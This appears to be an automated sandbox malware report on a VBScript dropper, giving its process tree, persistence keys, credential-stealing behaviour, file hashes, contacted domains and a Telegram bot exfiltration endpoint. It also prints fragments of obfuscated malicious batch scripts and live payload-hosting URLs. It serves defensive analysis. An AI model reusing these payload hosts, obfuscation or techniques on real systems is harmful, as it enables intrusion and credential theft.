            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR
            MITRE ATT&CK Matrix (one line per tactic column; a number in front of a technique is the report's hit badge for that technique, kept as extracted):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
            Resource Development: 121 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
            Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
            Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Shared Modules; 1 Exploitation for Client Execution; 12 Command and Scripting Interpreter; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
            Persistence: 121 Scripting; 1 DLL Side-Loading; 1 Valid Accounts; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 311 Process Injection; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 121 Masquerading; 1 Valid Accounts; 1 Modify Registry; 1 Access Token Manipulation; 2 Virtualization/Sandbox Evasion; 311 Process Injection
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
            Discovery: 1 System Time Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 36 System Information Discovery; 1 Query Registry; 251 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 System Network Configuration Discovery; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
            Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1592501  Sample: INQUIRY LIST 292.vbs  Startdate: 16/01/2025  Architecture: WINDOWS  Score: 100

            Sample-level nodes: reallyfreegeoip.org; www.volareconsultoria.com.br; 3 other IPs or domains. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 15 other signatures. Attached to reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP).

            Process tree (node ids as in the graph; each indented entry was started by the entry above it):

            10 wscript.exe
                dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32
                signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage)
                18 x.exe
                    network: volareconsultoria.com.br 50.116.86.44, 443, 49730, 49731 UNIFIEDLAYER-AS-1US United States
                    dropped: C:\Windows \SysWOW64\NETUTILS.dll, PE32+; C:\Users\Public\Libraries\liuuazhU.pif, PE32; C:\Users\Public\Libraries\Uhzauuil.PIF, PE32; 3 other files (2 malicious)
                    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops PE files with a suspicious file extension; 4 other signatures
                    27 liuuazhU.pif
                        network: checkip.dyndns.com 193.122.6.168, 49732, 49740, 49742 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.96.1, 443, 49733, 49741 CLOUDFLARENETUS United States
                        signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Tries to steal Mail credentials (via file / registry access); Uses cmd line tools excessively to alter registry or file data
                        39 reg.exe
                            49 conhost.exe
                    31 cmd.exe
                        41 conhost.exe
                    33 cmd.exe
                        43 conhost.exe
            14 Uhzauuil.PIF
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions
                23 liuuazhU.pif
                    35 reg.exe
                        45 conhost.exe
            16 Uhzauuil.PIF
                signatures: Allocates memory in foreign processes; Sample uses process hollowing technique
                25 liuuazhU.pif
                    signatures: Tries to steal Mail credentials (via file / registry access); Uses cmd line tools excessively to alter registry or file data; Tries to harvest and steal browser information (history, passwords, etc)
                    37 reg.exe
                        47 conhost.exe

            Source | Detection | Scanner | Label
            INQUIRY LIST 292.vbs | 32% | ReversingLabs | Script-WScript.Trojan.Valyria
            INQUIRY LIST 292.vbs | 100% | Avira | VBS/Drop.Agent.VPYN
            Source | Detection | Scanner | Label
            C:\Users\Public\Libraries\Uhzauuil.PIF | 100% | Avira | HEUR/AGEN.1325914
            C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | HEUR/AGEN.1325914
            C:\Windows \SysWOW64\NETUTILS.dll | 100% | Joe Sandbox ML |
            C:\Users\Public\Libraries\Uhzauuil.PIF | 42% | ReversingLabs | Win32.Trojan.Generic
            C:\Users\Public\Libraries\liuuazhU.pif | 3% | ReversingLabs |
            C:\Users\user\AppData\Local\Temp\x.exe | 42% | ReversingLabs | Win32.Trojan.Generic
            C:\Windows \SysWOW64\NETUTILS.dll | 61% | ReversingLabs | Win64.Trojan.Barys
            C:\Windows \SysWOW64\svchost.pif | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://www.volareconsultoria.com.br/u | 0% | Avira URL Cloud | safe
            https://www.volareconsultoria.com.br/245_Uhzauuilkul | 0% | Avira URL Cloud | safe
            https://www.volareconsultoria.com.br:443/245_Uhzauuilkuluo | 0% | Avira URL Cloud | safe
            https://reallyfreegeoip.orgfl | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            volareconsultoria.com.br | 50.116.86.44 | true | true | | unknown
            reallyfreegeoip.org | 104.21.96.1 | true | false | | high
            checkip.dyndns.com | 193.122.6.168 | true | false | | high
            checkip.dyndns.org | unknown | unknown | false | | high
            www.volareconsultoria.com.br | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
            https://www.volareconsultoria.com.br/245_Uhzauuilkul | true | Avira URL Cloud: safe | unknown
            http://checkip.dyndns.org/ | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | false | | high
            https://www.volareconsultoria.com.br/u | x.exe, 00000001.00000002.1855286953.0000000000726000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://sectigo.com/CPS0 | x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | false | | high
            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | false | | high
            http://ocsp.sectigo.com0 | x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | false | | high
            https://api.telegram.org/bot | liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | false | | high
            https://www.volareconsultoria.com.br:443/245_Uhzauuilkuluo | x.exe, 00000001.00000002.1855286953.0000000000751000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://checkip.dyndns.org | liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | false | | high
            http://checkip.dyndns.org/h | liuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://reallyfreegeoip.org/xml/8.46.123.189l | liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://reallyfreegeoip.orgfl | liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD66000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://checkip.dyndns.org/p | liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://reallyfreegeoip.org | liuuazhU.pif, 00000006.00000002.3109531523.000000001D531000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADD6000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                  high
                                                  https://reallyfreegeoip.orgliuuazhU.pif, 00000006.00000002.3109531523.000000001D458000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.comliuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameliuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.sectigo.com0Cx.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndnliuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.pmail.com0x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.drfalse
                                                              high
                                                              https://reallyfreegeoip.org/xml/liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
50.116.86.44 | volareconsultoria.com.br | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1592501
Start date and time: 2025-01-16 08:28:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: INQUIRY LIST 292.vbs
Detection: MAL
Classification: mal100.troj.spyw.evad.winVBS@28/11@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 160
• Number of non-executed functions: 93
Cookbook Comments:
• Found application associated with file extension: .vbs
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:29:12 | API Interceptor | 2x Sleep call for process: x.exe modified
02:29:29 | API Interceptor | 2x Sleep call for process: Uhzauuil.PIF modified
07:29:20 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Uhzauuil C:\Users\Public\Uhzauuil.url
07:29:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Uhzauuil C:\Users\Public\Uhzauuil.url
Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 8214
Entropy (8bit): 4.674238519900089
Encrypted: false
SSDEEP: 192:xmRmcVw5I1Rsv869gx2A9gB59zox8Y2MXNlT3l:xmcIDsss3ffY2MXDJ
MD5: 7821E3DE3812E791CF3B223500D73BC9
SHA1: 5E211B634CE77E6FEE83CE8A5B8C9A37C8B81E1D
SHA-256: 3DAA7F9EEE129F61F7A452F7150EE21A1C4141586A37F37842B9C3BB53152A74
SHA-512: 6EAE270065401626DF97B73A255578BF27B4F4DEA480954843823046AD95E40CF706C1A767C8765EF3AB48EA3A18498375614317EC00A9EF29A4DD21EDBC5F26
Malicious: false
                                                                                    Preview:@echo off..set "kocp=sket "..@% . .......%e%..... ..%c% .%h%......%o%..r.o% %......%o%....o.... %f%r%f%.. .%..s%.%e%..%t%. ..% %.%"%..%X%.. %I%.......%n%.....%i%....... %=%.......%s%...%e%. .o.%t%.....% %.r..r....%"%.%..%XIni%"%... %s% ......%K%o.%x%..%H%......%=%.........o%=%. ...%"%...o..%..%XIni%"%..........%F%.r.. ... %J%.%I%.o%V%......%I%.%x%. %F%........%p%..........%s%....... .%T%r..%%sKxH%h%.o....o..%2%....r....r%s%.....%h%...o..%"% ... %..%XIni%"%. .%B%.........%m%.....%T%...o.%j%........%M%.%S%......
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):28538
                                                                                    Entropy (8bit):4.650636495384082
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:Y0iUTHG+EnI6DRfX67uezyCqIUEfDTfF3K0QNqTTwNv7lkqj3DRvCpoVsodnqgJW:YwWbDRfipu7IUkfYQ0Xkqjgww
                                                                                    MD5:E24FA8FB365A89779B026772B9342AF3
                                                                                    SHA1:B90DE3C9F3093CA8BADFAF6C98218B744087E8F9
                                                                                    SHA-256:10D7B4EA056FC1037109FE6E6694849D145B0745FAA9AE02957104A2834A14A0
                                                                                    SHA-512:A32F7A29C4C8CC831A5057B8DB31F79E7DEDB9172AC9705DA6A8DA65384ED23827C3CCCDB833562CDAB63ADDD679341707A2B46BBC8C802845CBBBBB01771D10
                                                                                    Malicious:false
                                                                                    Preview:@echo off..@%.. ..%e%r.%c%...r.%h%..%o%r........% %....%o%. ..%f%..........%f%....%..s%. ......%e%.... ...%t%.% %.. o..o.%"%r.r.......%x%.......%u%..o..... %u%.%y%.......%=%o..r..%s%..%e% o%t%r.......% %..o%"%..r.....%..%xuuy%"%.........%J%...%o%..r ....%Z%...%u%.......%=%.%=%..%"%..........%..%xuuy%"%....%s%.......%F%..r..o..o%o%.......%F%.... .....%G%..%l%.r... ....%F%.%k%.%a%. ...%g%ro.. %%JoZu%h%.%2% ...r.%s%..........%h% %"%... .....%..%xuuy%"%......%H%..%O%.....r..%D%.. .%B%..... ...%e%.....
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):573566
                                                                                    Entropy (8bit):7.980117621307447
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:NIAbBGI0yoMha6YfLzqT2FqJv/bgjnNdqCq+eJOvMy9U/Et:xb7ZoLzqEqvTgjnNdqCq+10yG/Et
                                                                                    MD5:25DB6EECAE3F2A0E24C3C8ECBFEF5D73
                                                                                    SHA1:FF5E6B0317545B11F1AB51D225C5D8DCE9890C23
                                                                                    SHA-256:D9D561DF91D8D2A0B72A8CD5DF34561F127A0B4567372664D656DD3EA87E6FD9
                                                                                    SHA-512:074D6B37C377FD1EAE96D0C2835B638B6CFAAF8F86C2016560090F328CBAC13CE9DE32B9CE86DC0FF1D6C0A0730652A66956071B4B7C9E86F96AE80AF13A320C
                                                                                    Malicious:true
